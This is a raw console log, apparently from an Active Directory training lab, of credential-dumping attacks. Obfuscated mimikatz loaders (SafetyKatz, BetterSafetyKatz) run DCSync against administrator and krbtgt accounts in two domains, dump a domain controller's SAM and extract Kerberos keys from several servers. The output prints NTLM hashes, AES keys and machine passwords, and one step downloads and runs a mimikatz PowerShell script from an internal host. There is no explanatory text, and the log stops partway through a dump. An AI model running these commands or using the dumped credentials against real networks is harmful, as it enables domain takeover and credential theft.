Domain Admin Dump
PS C:\AD\Tools> .\SafetyKatz.exe '"lsadump::dcsync /user:dcorp\administrator"' "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:dcorp\administrator
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 11/11/2022 7:33:55 AM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-500
Object Relative ID : 500
Credentials:
Hash NTLM: af0686cc0ca8f04df42210c9ac980760
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6a53706d144b585f05e703bf463567bc
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-LOJKLRT8VA4Administrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
aes128_hmac (4096) : 2851a2dcf67dea5217c6fab951633584
des_cbc_md5 (4096) : ae857fd3ec19b63b
OldCredentials
aes256_hmac (4096) : 2e0a4ff15d58c3bba89f032bd85f342c31bfc656b190e054f50690de029653f4
aes128_hmac (4096) : a3b5cb95b4d259fa6e13c9f9067203a9
des_cbc_md5 (4096) : 08ce97c4c720ce0d
OlderCredentials
aes256_hmac (4096) : dcc9a74b4c1fdaafab4a15e39bb0243d1e32b1d759895b19f5b6ecbe5dc7570f
aes128_hmac (4096) : a304a23629c774268a8253ac3bb494b5
des_cbc_md5 (4096) : 1a7332648c738f8a
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WIN-LOJKLRT8VA4Administrator
Credentials
des_cbc_md5 : ae857fd3ec19b63b
OldCredentials
des_cbc_md5 : 08ce97c4c720ce0d
mimikatz(commandline) # exit
Bye!
KRBTGT Dump
PS C:\AD\Tools> .\SafetyKatz.exe '"lsadump::dcsync /user:dcorp\krbtgt"' "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
mimikatz(commandline) # exit
Bye!
SAM File Dump on DC
[dcorp-dc]: PS C:\Users\Administrator\Documents> .\SafetyKatz.exe '"token::elevate"' '"lsadump::sam"' '"exit"'
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
616 {0;000003e7} 1 D 17861 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;012d49d2} 0 D 19812734 dcorp\Administrator S-1-5-21-719815819-3726368948-3917688648-500 (12g,26p) Primary
* Thread Token : {0;000003e7} 1 D 19864231 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870
SAMKey : f3a9473cb084668dcf1d7e5f47562659
RID : 000001f4 (500)
User : Administrator
Hash NTLM: a102ad5753f4c441e3af31c97fad86fd
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
mimikatz(commandline) # exit
Bye!
[dcorp-dc]: PS C:\Users\Administrator\Documents>
mcorp krbtgt
PS C:\AD\Tools\Old_Tools> .\BetterSafetyKatz.exe '"lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local"'
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local
[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:46:24 PM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID : 502
Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
lm - 0: 87836055143ad5a507de2aaeb9000361
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7c7a5135513110d108390ee6c322423f
* Primary:Kerberos-Newer-Keys *
Default Salt : MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
aes128_hmac (4096) : 801bb69b81ef9283f280b97383288442
des_cbc_md5 (4096) : c20dc80d51f7abd9
* Primary:Kerberos *
Default Salt : MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : c20dc80d51f7abd9
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
mimikatz #
mcorp Administrator
PS C:\AD\Tools\Old_Tools> .\BetterSafetyKatz.exe '"lsadump::dcsync /user:mcorp\Administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local"'
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:mcorp\Administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local
[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 11/11/2022 7:33:23 AM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-500
Object Relative ID : 500
Credentials:
Hash NTLM: 71d04f9d50ceb1f64de7a09f23e6dc4c
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : fd1efebb8f6a43ec25bc21dd68e762bf
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-R6HGNL110DLAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0
aes128_hmac (4096) : 294d631dda15cc844b48a18a51f0e85e
des_cbc_md5 (4096) : ba4a1abc01d3ec9d
OldCredentials
aes256_hmac (4096) : 944f2ae7f0ecfeac6b494c44ef4b02fa6bbad1c65849f4aea40ed33cd7242f84
aes128_hmac (4096) : 57493a76eaf1bdcec3f310305773fbc3
des_cbc_md5 (4096) : 9b7586022fab5431
OlderCredentials
aes256_hmac (4096) : 3ee5808422b219225ab963c722f79f409835cd6a9a88408dd8fccb600b62508e
aes128_hmac (4096) : 5eed578bc4fe22ecb57f2a5c96f66bc2
des_cbc_md5 (4096) : cb57857c52676ba1
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WIN-R6HGNL110DLAdministrator
Credentials
des_cbc_md5 : ba4a1abc01d3ec9d
OldCredentials
des_cbc_md5 : 9b7586022fab5431
mimikatz #
dcorp-mssql Dump
PS C:\users\public> .\BetterSafetyKatz.exe '"sekurlsa::ekeys"' "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Slowly mapping ADVAPI32.dll
[+] Slowly mapping Cabinet.dll
[+] Slowly mapping CRYPT32.dll
[+] Slowly mapping cryptdll.dll
[+] Slowly mapping DNSAPI.dll
[+] Slowly mapping FLTLIB.DLL
[+] Slowly mapping MPR.dll
[+] Slowly mapping NETAPI32.dll
[+] Slowly mapping ODBC32.dll
[+] Slowly mapping ole32.dll
[+] Slowly mapping OLEAUT32.dll
[+] Slowly mapping RPCRT4.dll
[+] Slowly mapping SHLWAPI.dll
[+] Slowly mapping SAMLIB.dll
[+] Slowly mapping Secur32.dll
[+] Slowly mapping SHELL32.dll
[+] Slowly mapping USER32.dll
[+] Slowly mapping USERENV.dll
[+] Slowly mapping VERSION.dll
[+] Slowly mapping HID.DLL
[+] Slowly mapping SETUPAPI.dll
[+] Slowly mapping WinSCard.dll
[+] Slowly mapping WINSTA.dll
[+] Slowly mapping WLDAP32.dll
[+] Slowly mapping advapi32.dll
[+] Slowly mapping msasn1.dll
[+] Slowly mapping ntdll.dll
[+] Slowly mapping netapi32.dll
[+] Slowly mapping KERNEL32.dll
[+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 318848 (00000000:0004dd80)
Session : RemoteInteractive from 2
User Name : sqladmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:44:11 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1113
* Username : sqladmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac a4ca89db48cb0d724e6394fd62181a0cd3b7544885bdd7d03bfc00f269c07d26
rc4_hmac_nt 07e8be316e3da9a042a9cb681df19bf5
rc4_hmac_old 07e8be316e3da9a042a9cb681df19bf5
rc4_md4 07e8be316e3da9a042a9cb681df19bf5
rc4_hmac_nt_exp 07e8be316e3da9a042a9cb681df19bf5
rc4_hmac_old_exp 07e8be316e3da9a042a9cb681df19bf5
Authentication Id : 0 ; 301735 (00000000:00049aa7)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:44:01 PM
SID : S-1-5-96-0-2
* Username : DCORP-MSSQL$
* Domain : dollarcorp.moneycorp.local
* Password : liewB@Xr% _bGCN&2^p^ Sq!0uC*K2pwh1su1L"<A>,\\Z/"g4I"-JcTGDswG"B.[bPPE?'Pz`8yrYQ,a]/)--\\@*@0;U2M]4Uo,=pFx(V46D/Bz0KRo=5X3j
* Key List :
aes256_hmac 3cc44d0941bf91481d23632207b32564e487e1944e55f1117f70a8da43e9648d
aes128_hmac 41a5eb0d3933d88a664828437b510470
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-MSSQL$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:36:25 PM
SID : S-1-5-20
* Username : dcorp-mssql$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 313d23121165b3cbceb17b95dddd5b132727446bfd5200f6dde96a1d3eb4c3bf
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 55382 (00000000:0000d856)
Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2/20/2024 11:36:29 PM
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
* Username : DCORP-MSSQL$
* Domain : dollarcorp.moneycorp.local
* Password : liewB@Xr% _bGCN&2^p^ Sq!0uC*K2pwh1su1L"<A>,\\Z/"g4I"-JcTGDswG"B.[bPPE?'Pz`8yrYQ,a]/)--\\@*@0;U2M]4Uo,=pFx(V46D/Bz0KRo=5X3j
* Key List :
aes256_hmac 3cc44d0941bf91481d23632207b32564e487e1944e55f1117f70a8da43e9648d
aes128_hmac 41a5eb0d3933d88a664828437b510470
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 20905 (00000000:000051a9)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:36:25 PM
SID : S-1-5-96-0-0
* Username : DCORP-MSSQL$
* Domain : dollarcorp.moneycorp.local
* Password : liewB@Xr% _bGCN&2^p^ Sq!0uC*K2pwh1su1L"<A>,\\Z/"g4I"-JcTGDswG"B.[bPPE?'Pz`8yrYQ,a]/)--\\@*@0;U2M]4Uo,=pFx(V46D/Bz0KRo=5X3j
* Key List :
aes256_hmac 3cc44d0941bf91481d23632207b32564e487e1944e55f1117f70a8da43e9648d
aes128_hmac 41a5eb0d3933d88a664828437b510470
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 20851 (00000000:00005173)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:36:25 PM
SID : S-1-5-96-0-1
* Username : DCORP-MSSQL$
* Domain : dollarcorp.moneycorp.local
* Password : liewB@Xr% _bGCN&2^p^ Sq!0uC*K2pwh1su1L"<A>,\\Z/"g4I"-JcTGDswG"B.[bPPE?'Pz`8yrYQ,a]/)--\\@*@0;U2M]4Uo,=pFx(V46D/Bz0KRo=5X3j
* Key List :
aes256_hmac 3cc44d0941bf91481d23632207b32564e487e1944e55f1117f70a8da43e9648d
aes128_hmac 41a5eb0d3933d88a664828437b510470
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-MSSQL$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:36:24 PM
SID : S-1-5-18
* Username : dcorp-mssql$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 313d23121165b3cbceb17b95dddd5b132727446bfd5200f6dde96a1d3eb4c3bf
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
mimikatz(commandline) # exit
Dumping dcorp-ciadmin
PS C:\users\ciadmin> .\BetterSafetyKatz.exe '"sekurlsa::ekeys"' "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Slowly mapping ADVAPI32.dll
[+] Slowly mapping Cabinet.dll
[+] Slowly mapping CRYPT32.dll
[+] Slowly mapping cryptdll.dll
[+] Slowly mapping DNSAPI.dll
[+] Slowly mapping FLTLIB.DLL
[+] Slowly mapping MPR.dll
[+] Slowly mapping NETAPI32.dll
[+] Slowly mapping ODBC32.dll
[+] Slowly mapping ole32.dll
[+] Slowly mapping OLEAUT32.dll
[+] Slowly mapping RPCRT4.dll
[+] Slowly mapping SHLWAPI.dll
[+] Slowly mapping SAMLIB.dll
[+] Slowly mapping Secur32.dll
[+] Slowly mapping SHELL32.dll
[+] Slowly mapping USER32.dll
[+] Slowly mapping USERENV.dll
[+] Slowly mapping VERSION.dll
[+] Slowly mapping HID.DLL
[+] Slowly mapping SETUPAPI.dll
[+] Slowly mapping WinSCard.dll
[+] Slowly mapping WINSTA.dll
[+] Slowly mapping WLDAP32.dll
[+] Slowly mapping advapi32.dll
[+] Slowly mapping msasn1.dll
[+] Slowly mapping ntdll.dll
[+] Slowly mapping netapi32.dll
[+] Slowly mapping KERNEL32.dll
[+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 134514 (00000000:00020d72)
Session : Service from 0
User Name : ciadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:35:49 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1121
* Username : ciadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 1bbe86f1b5285109dd1450b55ed8851c220b81cc187f9af64e4048ed25083879
rc4_hmac_nt e08253add90dccf1a208523d02998c3d
rc4_hmac_old e08253add90dccf1a208523d02998c3d
rc4_md4 e08253add90dccf1a208523d02998c3d
rc4_hmac_nt_exp e08253add90dccf1a208523d02998c3d
rc4_hmac_old_exp e08253add90dccf1a208523d02998c3d
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-CI$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:36 PM
SID : S-1-5-20
* Username : dcorp-ci$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
Authentication Id : 0 ; 20746 (00000000:0000510a)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:35 PM
SID : S-1-5-96-0-0
* Username : DCORP-CI$
* Domain : dollarcorp.moneycorp.local
* Password : 6V=+L&GQNU;"au(VO9%jq<_^=F`3JqMC"P!Q0ho[Iq[(Cum]rS%jKK(#-]d-hrI<nB6vVo"DLgEwEY:*c`Q>`3>RCun/3^$rc4N(eEk"$WEtwqZh[8&/KH\\t
* Key List :
aes256_hmac e5fe14a5019f866e6618092bd6c29958fdbdaa6f3dabc1bc9f6c42164b16a080
aes128_hmac 86831a80fa8028ceed42f2fbc93bf94d
rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
Authentication Id : 0 ; 349379 (00000000:000554c3)
Session : RemoteInteractive from 2
User Name : ciadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:43:13 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1121
* Username : ciadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 1bbe86f1b5285109dd1450b55ed8851c220b81cc187f9af64e4048ed25083879
rc4_hmac_nt e08253add90dccf1a208523d02998c3d
rc4_hmac_old e08253add90dccf1a208523d02998c3d
rc4_md4 e08253add90dccf1a208523d02998c3d
rc4_hmac_nt_exp e08253add90dccf1a208523d02998c3d
rc4_hmac_old_exp e08253add90dccf1a208523d02998c3d
Authentication Id : 0 ; 332770 (00000000:000513e2)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:43:07 PM
SID : S-1-5-96-0-2
* Username : DCORP-CI$
* Domain : dollarcorp.moneycorp.local
* Password : 6V=+L&GQNU;"au(VO9%jq<_^=F`3JqMC"P!Q0ho[Iq[(Cum]rS%jKK(#-]d-hrI<nB6vVo"DLgEwEY:*c`Q>`3>RCun/3^$rc4N(eEk"$WEtwqZh[8&/KH\\t
* Key List :
aes256_hmac e5fe14a5019f866e6618092bd6c29958fdbdaa6f3dabc1bc9f6c42164b16a080
aes128_hmac 86831a80fa8028ceed42f2fbc93bf94d
rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
Authentication Id : 0 ; 20702 (00000000:000050de)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:35 PM
SID : S-1-5-96-0-1
* Username : DCORP-CI$
* Domain : dollarcorp.moneycorp.local
* Password : 6V=+L&GQNU;"au(VO9%jq<_^=F`3JqMC"P!Q0ho[Iq[(Cum]rS%jKK(#-]d-hrI<nB6vVo"DLgEwEY:*c`Q>`3>RCun/3^$rc4N(eEk"$WEtwqZh[8&/KH\\t
* Key List :
aes256_hmac e5fe14a5019f866e6618092bd6c29958fdbdaa6f3dabc1bc9f6c42164b16a080
aes128_hmac 86831a80fa8028ceed42f2fbc93bf94d
rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-CI$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:35 PM
SID : S-1-5-18
* Username : dcorp-ci$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
dcorp-adminsrv dump
[dcorp-adminsrv]: PS C:\Windows\Temp> wget -Uri http://172.16.100.22/Invoke-MimiEx.ps1 -OutFile Invoke-MimiEx.ps1
[dcorp-adminsrv]: PS C:\Windows\Temp> .\Invoke-MimiEx.ps1
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(powershell) # sEKurlSa::EkEyS
Authentication Id : 0 ; 223555 (00000000:00036943)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:42:07 PM
SID : S-1-5-96-0-2
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:06 PM
SID : S-1-5-20
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 240669 (00000000:0003ac1d)
Session : RemoteInteractive from 2
User Name : srvadmin
